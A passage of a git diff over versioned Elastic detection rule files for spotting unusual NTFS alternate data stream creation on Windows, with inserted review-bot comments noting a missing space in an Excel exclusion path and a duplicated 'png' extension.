Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft 
Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n",
 "related_integrations": [
 {
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json
index c5451ba3b7b..66a810d6460 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_110.json
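Review bot: The `process.executable` exclusion list in the unchanged `query` line of the `@@ -13,7 +13,7 @@` hunk contains `\"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\"` with no space before `(x86)`, while every other 32-bit entry on the same line uses `Program Files (x86)`; as written the entry does not match the standard 32-bit Office install path, so the Excel exclusion is ineffective and ADS creations by 32-bit Excel will keep alerting on the listed extensions. The corrected entry is `\"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\"`. The same line also lists `\"png\"` twice in the `file.extension` set, which is harmless but suggests the list was not deduplicated when the Office entries were added. Both are context lines this commit does not touch, and since these files are versioned rule snapshots the fix likely belongs in a new rule version; the `_110.json` hunk that follows is cut off here, so I cannot tell whether it carries the same entry.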
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files 
(x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json index ccd0208fe5f..200339f4404 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_111.json 
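Review bot: The `process.executable` exclusion list in the query (a context line of this hunk) contains the EQL string `"?:\\Program Files(x86)\\Microsoft Office\\root\\*\\EXCEL.EXE"` without the space in `Program Files (x86)`, so unlike the OUTLOOK, POWERPNT and WINWORD entries the 32-bit Excel path never matches and those creations are not excluded; the entry should read `"?:\\Program Files (x86)\\Microsoft Office\\root\\*\\EXCEL.EXE"`. The `file.extension` list also carries `"png"` twice, which is harmless but suggests the list was not deduplicated. The `old_weblogs_*:$DATA` exception is a wildcard under a user-profile path with no accompanying `process.executable` condition, whereas the rule's own false-positive guidance recommends combining process and file conditions for exceptions, so it is worth tightening. Because these JSON files appear to be generated exports, the fix presumably belongs in the upstream rule source rather than in this diff. The same query text appears in the `@@ -13,7 +13,7 @@` hunk of `71bccb61-e19b-452f-b104-79a60e546a95_111.json` below and in the hunk cut off at the top of this chunk.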
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files 
